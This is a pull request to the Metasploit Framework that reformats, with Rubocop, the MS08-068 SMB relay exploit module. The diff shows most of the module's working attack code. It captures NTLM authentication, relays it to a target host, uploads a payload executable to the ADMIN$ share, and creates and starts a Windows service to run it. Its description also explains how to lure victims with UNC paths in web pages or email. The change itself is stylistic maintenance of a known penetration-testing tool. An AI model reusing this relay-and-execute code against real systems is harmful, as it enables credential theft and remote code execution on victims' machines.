### PR TITLE
Rubocop smb relay module

### DIFF
--- a/modules/exploits/windows/smb/smb_relay.rb
+++ b/modules/exploits/windows/smb/smb_relay.rb
@@ -15,7 +15,6 @@ under:
      Network Access: Sharing and security model for local accounts
 =end
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -23,55 +22,53 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'MS08-068 Microsoft Windows SMB Relay Code Execution',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'MS08-068 Microsoft Windows SMB Relay Code Execution',
+        'Description' => %q{
           This module will relay SMB authentication requests to another
-        host, gaining access to an authenticated SMB session if successful.
-        If the connecting user is an administrator and network logins are
-        allowed to the target machine, this module will execute an arbitrary
-        payload. To exploit this, the target system	must try to	authenticate
-        to this module. The easiest way to force a SMB authentication attempt
-        is by embedding a UNC path (\\\\SERVER\\SHARE) into a web page or
-        email message. When the victim views the web page or email, their
-        system will automatically connect to the server specified in the UNC
-        share (the IP address of the system running this module) and attempt
-        to authenticate.  Unfortunately, this
-        module is not able to clean up after itself. The service and payload
-        file listed in the output will need to be manually removed after access
-        has been gained. The service created by this tool uses a randomly chosen
-        name and description, so the services list can become cluttered after
-        repeated exploitation.
+          host, gaining access to an authenticated SMB session if successful.
+          If the connecting user is an administrator and network logins are
+          allowed to the target machine, this module will execute an arbitrary
+          payload. To exploit this, the target system	must try to	authenticate
+          to this module. The easiest way to force a SMB authentication attempt
+          is by embedding a UNC path (\SERVER\SHARE) into a web page or
+          email message. When the victim views the web page or email, their
+          system will automatically connect to the server specified in the UNC
+          share (the IP address of the system running this module) and attempt
+          to authenticate.  Unfortunately, this
+          module is not able to clean up after itself. The service and payload
+          file listed in the output will need to be manually removed after access
+          has been gained. The service created by this tool uses a randomly chosen
+          name and description, so the services list can become cluttered after
+          repeated exploitation.
 
-        The SMB authentication relay attack was first reported by Sir Dystic on
-        March 31st, 2001 at @lanta.con in Atlanta, Georgia.
+          The SMB authentication relay attack was first reported by Sir Dystic on
+          March 31st, 2001 at @lanta.con in Atlanta, Georgia.
 
-        On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin
-        includes a patch which prevents the relaying of challenge keys back to
-        the host which issued them, preventing this exploit from working in
-        the default configuration. It is still possible to set the SMBHOST
-        parameter to a third-party host that the victim is authorized to access,
-        but the "reflection" attack has been effectively broken.
-      },
-      'Author'         =>
-        [
+          On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin
+          includes a patch which prevents the relaying of challenge keys back to
+          the host which issued them, preventing this exploit from working in
+          the default configuration. It is still possible to set the SMBHOST
+          parameter to a third-party host that the victim is authorized to access,
+          but the "reflection" attack has been effectively broken.
+        },
+        'Author' => [
           'hdm', # All the work
           'juan vazquez' # Add NTLMSSP support to the exploit
         ],
-      'License'        => MSF_LICENSE,
-      'Privileged'     => true,
-      'DefaultOptions' =>
-        {
+        'License' => MSF_LICENSE,
+        'Privileged' => true,
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread'
         },
-      'Payload'        =>
-        {
-          'Space'        => 2048,
-          'DisableNops'  => true,
-          'StackAdjustment' => -3500,
+        'Payload' => {
+          'Space' => 2048,
+          'DisableNops' => true,
+          'StackAdjustment' => -3500
         },
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2008-4037'],
           [ 'OSVDB', '49736'],
           [ 'MSB', 'MS08-068'],
@@ -79,24 +76,25 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ],
           [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
         ],
-      'Arch'           => [ARCH_X86, ARCH_X64],
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
-          [ 'Automatic', { } ],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Platform' => 'win',
+        'Targets' => [
+          [ 'Automatic', {} ],
         ],
-      'DisclosureDate' => '2001-03-31',
-      'DefaultTarget'  => 0 ))
+        'DisclosureDate' => '2001-03-31',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options(
       [
-        OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]),
-        OptString.new('SHARE',    [ true, "The share to connect to", 'ADMIN$' ])
-      ])
+        OptAddress.new('SMBHOST', [ false, 'The target SMB server (leave empty for originating system)']),
+        OptString.new('SHARE', [ true, 'The share to connect to', 'ADMIN$' ])
+      ]
+    )
   end
 
-
-  if (not const_defined?('NDR'))
+  if !const_defined?('NDR')
     NDR = Rex::Encoder::NDR
   end
 
@@ -110,29 +108,29 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     unless smb[:ntlmssp] || rclient.client.auth_user
-      print_line(" ")
+      print_line(' ')
       print_error(
-        "FAILED! The remote host has only provided us with Guest privileges. " +
-        "Please make sure that the correct username and password have been provided. " +
-        "Windows XP systems that are not part of a domain will only provide Guest privileges " +
-        "to network logins by default."
+        'FAILED! The remote host has only provided us with Guest privileges. ' \
+        'Please make sure that the correct username and password have been provided. ' \
+        'Windows XP systems that are not part of a domain will only provide Guest privileges ' \
+        'to network logins by default.'
       )
-      print_line(" ")
+      print_line(' ')
       return
     end
 
-    print_status("Connecting to the defined share...")
+    print_status('Connecting to the defined share...')
     rclient.connect("\\\\#{smb[:rhost]}\\#{datastore['SHARE']}")
 
     @pwned[smb[:rhost]] = true
 
-    print_status("Regenerating the payload...")
+    print_status('Regenerating the payload...')
     code = regenerate_payload(smb[:rsock])
 
     # Upload the shellcode to a file
-    print_status("Uploading payload...")
+    print_status('Uploading payload...')
 
-    filename = rand_text_alpha(8) + ".exe"
+    filename = rand_text_alpha(8) + '.exe'
     servicename = rand_text_alpha(8)
 
     fd = rclient.open("\\#{filename}", 'rwct')
@@ -140,11 +138,11 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       exe = ''
       opts = {
-        :servicename => servicename,
-        :code => code.encoded
+        servicename: servicename,
+        code: code.encoded
       }
       if datastore['PAYLOAD'].include?(ARCH_X64)
-        opts.merge!({ :arch => ARCH_X64 })
+        opts.merge!({ arch: ARCH_X64 })
       end
       exe = generate_payload_exe_service(opts)
 
@@ -158,16 +156,16 @@ class MetasploitModule < Msf::Exploit::Remote
     # Disconnect from the SHARE
     rclient.disconnect("\\\\#{smb[:rhost]}\\#{datastore['SHARE']}")
 
-    print_status("Connecting to the Service Control Manager...")
+    print_status('Connecting to the Service Control Manager...')
     rclient.connect("\\\\#{smb[:rhost]}\\IPC$")
 
-    dcerpc = smb_dcerpc(c, '367abb81-9844-35f1-ad32-98f038001003', '2.0', "\\svcctl")
+    dcerpc = smb_dcerpc(c, '367abb81-9844-35f1-ad32-98f038001003', '2.0', '\\svcctl')
 
     ##
     # OpenSCManagerW()
     ##
 
-    print_status("Obtaining a service manager handle...")
+    print_status('Obtaining a service manager handle...')
     scm_handle = nil
     stubdata =
       NDR.uwstring("\\\\#{smb[:rhost]}") +
@@ -175,8 +173,8 @@ class MetasploitModule < Msf::Exploit::Remote
       NDR.long(0xF003F)
     begin
       response = dcerpc.call(0x0f, stubdata)
-      if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-        scm_handle = dcerpc.last_response.stub_data[0,20]
+      if (!dcerpc.last_response.nil? && !dcerpc.last_response.stub_data.nil?)
+        scm_handle = dcerpc.last_response.stub_data[0, 20]
       end
     rescue ::Exception => e
       print_error("Error: #{e}")
@@ -188,21 +186,19 @@ class MetasploitModule < Msf::Exploit::Remote
     ##
 
     servicename = rand_text_alpha(8)
-    displayname = rand_text_alpha(rand(32)+1)
-    svc_handle  = nil
-    svc_status  = nil
+    displayname = rand_text_alpha(rand(1..32))
+    svc_handle = nil
+    svc_status = nil
 
-    print_status("Creating a new service...")
+    print_status('Creating a new service...')
     stubdata =
       scm_handle +
       NDR.wstring(servicename) +
       NDR.uwstring(displayname) +
-
       NDR.long(0x0F01FF) + # Access: MAX
       NDR.long(0x00000110) + # Type: Interactive, Own process
       NDR.long(0x00000003) + # Start: Demand
       NDR.long(0x00000000) + # Errors: Ignore
-
       NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path
       NDR.long(0) + # LoadOrderGroup
       NDR.long(0) + # Dependencies
@@ -213,20 +209,19 @@ class MetasploitModule < Msf::Exploit::Remote
       NDR.long(0)   # Password
     begin
       response = dcerpc.call(0x0c, stubdata)
-      if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-        svc_handle = dcerpc.last_response.stub_data[0,20]
-        svc_status = dcerpc.last_response.stub_data[24,4]
+      if (!dcerpc.last_response.nil? && !dcerpc.last_response.stub_data.nil?)
+        svc_handle = dcerpc.last_response.stub_data[0, 20]
+        svc_status = dcerpc.last_response.stub_data[24, 4]
       end
     rescue ::Exception => e
       print_error("Error: #{e}")
       return
     end
 
-
     ##
     # CloseHandle()
     ##
-    print_status("Closing service handle...")
+    print_status('Closing service handle...')
     begin
       response = dcerpc.call(0x0, svc_handle)
     rescue ::Exception
@@ -235,7 +230,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ##
     # OpenServiceW
     ##
-    print_status("Opening service...")
+    print_status('Opening service...')
     begin
       stubdata =
         scm_handle +
@@ -243,8 +238,8 @@ class MetasploitModule < Msf::Exploit::Remote
         NDR.long(0xF01FF)
 
       response = dcerpc.call(0x10, stubdata)
-      if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-        svc_handle = dcerpc.last_response.stub_data[0,20]
+      if (!dcerpc.last_response.nil? && !dcerpc.last_response.stub_data.nil?)
+        svc_handle = dcerpc.last_response.stub_data[0, 20]
       end
     rescue ::Exception => e
       print_error("Error: #{e}")
@@ -254,29 +249,29 @@ class MetasploitModule < Msf::Exploit::Remote
     ##
     # StartService()
     ##
-    print_status("Starting the service...")
+    print_status('Starting the service...')
     stubdata =
       svc_handle +
       NDR.long(0) +
       NDR.long(0)
     begin
       response = dcerpc.call(0x13, stubdata)
-      if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+      if (!dcerpc.last_response.nil? && !dcerpc.last_response.stub_data.nil?)
       end
     rescue ::Exception => e
       return
-      #print_error("Error: #{e}")
+      # print_error("Error: #{e}")
     end
 
     ##
     # DeleteService()
     ##
-    print_status("Removing the service...")
+    print_status('Removing the service...')
     stubdata =
       svc_handle
     begin
       response = dcerpc.call(0x02, stubdata)
-      if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+      if (!dcerpc.last_response.nil? && !dcerpc.last_response.stub_data.nil?)
       end
     rescue ::Exception => e
       print_error("Error: #{e}")
@@ -285,7 +280,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ##
     # CloseHandle()
     ##
-    print_status("Closing service handle...")
+    print_status('Closing service handle...')
     begin
       response = dcerpc.call(0x0, svc_handle)
     rescue ::Exception => e
@@ -299,9 +294,8 @@ class MetasploitModule < Msf::Exploit::Remote
     rclient.delete("\\#{filename}")
   end
 
-
   def smb_dcerpc(c, uuid, version, pipe)
-    smb  = @state[c]
+    smb = @state[c]
     opts = {
       'Msf' => framework,
       'MsfExploit' => self,
@@ -312,7 +306,6 @@ class MetasploitModule < Msf::Exploit::Remote
     handle = Rex::Proto::DCERPC::Handle.new([uuid, version], 'ncacn_np', smb[:ip], [pipe])
     dcerpc = Rex::Proto::DCERPC::Client.new(handle, smb[:rsock], opts)
   end
-
 
   def smb_cmd_dispatch(cmd, c, buff)
     smb = @state[c]
@@ -330,8 +323,8 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Denying tree connect from #{smb[:name]}")
       pkt = CONST::SMB_BASE_PKT.make_struct
       pkt['Payload']['SMB'].v['Command'] = cmd
-      pkt['Payload']['SMB'].v['Flags1']  = 0x88
-      pkt['Payload']['SMB'].v['Flags2']  = 0xc001
+      pkt['Payload']['SMB'].v['Flags1'] = 0x88
+      pkt['Payload']['SMB'].v['Flags2'] = 0xc001
       pkt['Payload']['SMB'].v['ErrorClass'] = 0xc0000022
       c.put(pkt.to_s)
 
@@ -339,8 +332,8 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Ignoring request from #{smb[:name]} (#{cmd})")
       pkt = CONST::SMB_BASE_PKT.make_struct
       pkt['Payload']['SMB'].v['Command'] = cmd
-      pkt['Payload']['SMB'].v['Flags1']  = 0x88
-      pkt['Payload']['SMB'].v['Flags2']  = 0xc001
+      pkt['Payload']['SMB'].v['Flags1'] = 0x88
+      pkt['Payload']['SMB'].v['Flags2'] = 0xc001
       pkt['Payload']['SMB'].v['ErrorClass'] = 0 # 0xc0000022
       c.put(pkt.to_s)
     end
@@ -357,19 +350,19 @@ class MetasploitModule < Msf::Exploit::Remote
     flags2 = pkt['Payload']['SMB'].v['Flags2']
     extended_security = (flags2 & 0x800 == 0x800)
 
-    group    = ''
-    machine  = smb[:nbsrc]
+    group = ''
+    machine = smb[:nbsrc]
 
     dialects = pkt['Payload'].v['Payload'].gsub(/\x00/, '').split(/\x02/).grep(/^\w+/)
     # print_status("Negotiation from #{smb[:name]}: #{dialects.join(", ")}")
 
     dialect =
-      dialects.index("NT LM 0.12") ||
-      dialects.length-1
+      dialects.index('NT LM 0.12') ||
+      dialects.length - 1
 
     # Dialect selected, now we try to the target system
     target_host = datastore['SMBHOST']
-    if (not target_host or target_host.strip.length == 0)
+    if (!target_host || target_host.strip.empty?)
       target_host = smb[:ip]
     end
 
@@ -407,7 +400,7 @@ class MetasploitModule < Msf::Exploit::Remote
     pkt['Payload'].v['Capabilities'] = smb[:ntlmssp] ? 0x8000e3fd : 0xe3fd
     pkt['Payload'].v['ServerTime'] = time_lo
     pkt['Payload'].v['ServerDate'] = time_hi
-    pkt['Payload'].v['Timezone']   = 0x0
+    pkt['Payload'].v['Timezone'] = 0x0
     pkt['Payload'].v['SessionKey'] = 0
     if smb[:ntlmssp]
       pkt['Payload'].v['KeyLength'] = 0
@@ -431,12 +424,12 @@ class MetasploitModule < Msf::Exploit::Remote
       rport = rport_
       begin
         rsock = Rex::Socket::Tcp.create(
-          'PeerHost'  => target_host,
-          'PeerPort'  => rport,
-          'Timeout'   => 3,
-          'Context'   =>
+          'PeerHost' => target_host,
+          'PeerPort' => rport,
+          'Timeout' => 3,
+          'Context' =>
             {
-              'Msf'        => framework,
+              'Msf' => framework,
               'MsfExploit' => self
             }
         )
@@ -453,7 +446,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    rclient = Rex::Proto::SMB::SimpleClient.new(rsock, rport == 445 ? true : false, backend: :rex)
+    rclient = Rex::Proto::SMB::SimpleClient.new(rsock, rport == 445, backend: :rex)
 
     begin
       rclient.login_split_start_ntlm1(smb[:nbsrc])
@@ -485,12 +478,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     begin
       rsock = Rex::Socket::Tcp.create(
-        'PeerHost'  => target_host,
-        'PeerPort'  => rport,
-        'Timeout'   => 3,
-        'Context'   =>
+        'PeerHost' => target_host,
+        'PeerPort' => rport,
+        'Timeout' => 3,
+        'Context' =>
           {
-            'Msf'        => framework,
+            'Msf' => framework,
             'MsfExploit' => self
           }
       )
@@ -551,51 +544,48 @@ class MetasploitModule < Msf::Exploit::Remote
     pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct
     pkt.from_s(buff)
 
-
     # Record the remote multiplex ID
     smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID']
 
     lm_len = pkt['Payload'].v['PasswordLenLM']
     nt_len = pkt['Payload'].v['PasswordLenNT']
 
-    lm_hash = pkt['Payload'].v['Payload'][0, lm_len].unpack("H*")[0]
-    nt_hash = pkt['Payload'].v['Payload'][lm_len, nt_len].unpack("H*")[0]
-
+    lm_hash = pkt['Payload'].v['Payload'][0, lm_len].unpack('H*')[0]
+    nt_hash = pkt['Payload'].v['Payload'][lm_len, nt_len].unpack('H*')[0]
 
     buff = pkt['Payload'].v['Payload']
     buff.slice!(0, lm_len + nt_len)
     names = buff.split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
 
     smb[:username] = names[0]
-    smb[:domain]   = names[1]
-    smb[:peer_os]   = names[2]
-    smb[:peer_lm]   = names[3]
-
+    smb[:domain] = names[1]
+    smb[:peer_os] = names[2]
+    smb[:peer_lm] = names[3]
 
     # Clean up the data for loggging
-    if (smb[:username] == "")
+    if (smb[:username] == '')
       smb[:username] = nil
     end
 
-    if (smb[:domain] == "")
+    if (smb[:domain] == '')
       smb[:domain] = nil
     end
 
     print_status(
-      "Received #{smb[:name]} #{smb[:domain]}\\#{smb[:username]} " +
-        "LMHASH:#{lm_hash ? lm_hash : "<NULL>"} NTHASH:#{nt_hash ? nt_hash : "<NULL>"} " +
+      "Received #{smb[:name]} #{smb[:domain]}\\#{smb[:username]} " \
+        "LMHASH:#{lm_hash || '<NULL>'} NTHASH:#{nt_hash || '<NULL>'} " \
         "OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}"
     )
 
-    if (lm_hash == "" or lm_hash == "00")
+    if ((lm_hash == '') || (lm_hash == '00'))
       lm_hash = nil
     end
 
-    if (nt_hash == "")
+    if (nt_hash == '')
       nt_hash = nil
     end
 
-    if (lm_hash or nt_hash)
+    if (lm_hash || nt_hash)
       rclient = smb[:rclient]
       print_status("Authenticating to #{smb[:rhost]} as #{smb[:domain]}\\#{smb[:username]}...")
       res = nil
@@ -604,8 +594,8 @@ class MetasploitModule < Msf::Exploit::Remote
         res = rclient.login_split_next_ntlm1(
           smb[:username],
           smb[:domain],
-          [ (lm_hash ? lm_hash : "00" * 24) ].pack("H*"),
-          [ (nt_hash ? nt_hash : "00" * 24) ].pack("H*")
+          [ (lm_hash || '00' * 24) ].pack('H*'),
+          [ (nt_hash || '00' * 24) ].pack('H*')
         )
       rescue XCEPT::LoginError
       end
@@ -624,8 +614,8 @@ class MetasploitModule < Msf::Exploit::Remote
     smb_set_defaults(c, pkt)
 
     pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
-    pkt['Payload']['SMB'].v['Flags1']  = 0x88
-    pkt['Payload']['SMB'].v['Flags2']  = 0xc001
+    pkt['Payload']['SMB'].v['Flags1'] = 0x88
+    pkt['Payload']['SMB'].v['Flags2'] = 0xc001
     pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000022
     c.put(pkt.to_s)
   end
@@ -639,21 +629,21 @@ class MetasploitModule < Msf::Exploit::Remote
     blob_length = pkt['Payload'].v['SecurityBlobLen']
     blob = pkt['Payload'].v['Payload'][0, blob_length]
 
-    #detect if GSS is being used I need to fix this code.... but
-    if blob[0,7] == 'NTLMSSP'
+    # detect if GSS is being used I need to fix this code.... but
+    if blob[0, 7] == 'NTLMSSP'
       c_gss = false
     else
       c_gss = true
       start = blob.index('NTLMSSP')
       if start
-        blob.slice!(0,start)
+        blob.slice!(0, start)
       else
         print_status("SMB Capture - Error finding NTLMSSP in SMB_COM_SESSION_SETUP_ANDX request from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
         smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
         return
       end
     end
-    ntlm_message = NTLM_MESSAGE::parse(blob)
+    ntlm_message = NTLM_MESSAGE.parse(blob)
 
     case ntlm_message
     when NTLM_MESSAGE::Type1
@@ -697,13 +687,13 @@ class MetasploitModule < Msf::Exploit::Remote
     smb_set_defaults(c, challenge)
 
     native_data = ''
-    native_data << "Unix\x00" #Native OS
-    native_data << "Samba\x00" #Native LanMAN
+    native_data << "Unix\x00" # Native OS
+    native_data << "Samba\x00" # Native LanMAN
 
     challenge['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
     challenge['Payload']['SMB'].v['ErrorClass'] = CONST::SMB_STATUS_MORE_PROCESSING_REQUIRED
     challenge['Payload']['SMB'].v['Flags1'] = 0x80
-    challenge['Payload']['SMB'].v['Flags2'] =  0xc801 # no signing
+    challenge['Payload']['SMB'].v['Flags2'] = 0xc801 # no signing
     challenge['Payload']['SMB'].v['WordCount'] = 4
     challenge['Payload'].v['AndX'] = 0xFF
     challenge['Payload'].v['Reserved1'] = 0x00
@@ -741,7 +731,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     resp = rclient.client.smb_recv_parse(CONST::SMB_COM_SESSION_SETUP_ANDX, true)
 
-    #check if auth was successful
+    # check if auth was successful
     if (resp['Payload']['SMB'].v['ErrorClass'] == 0)
       print_good("SMB auth relay against #{smb[:rhost]} succeeded")
       smb_haxor(c)


### PR DESCRIPTION
Running Rubocop on the existing smb relay module, there should be no semantic differences in behavior

Pre-requisite to https://github.com/rapid7/metasploit-framework/pull/16098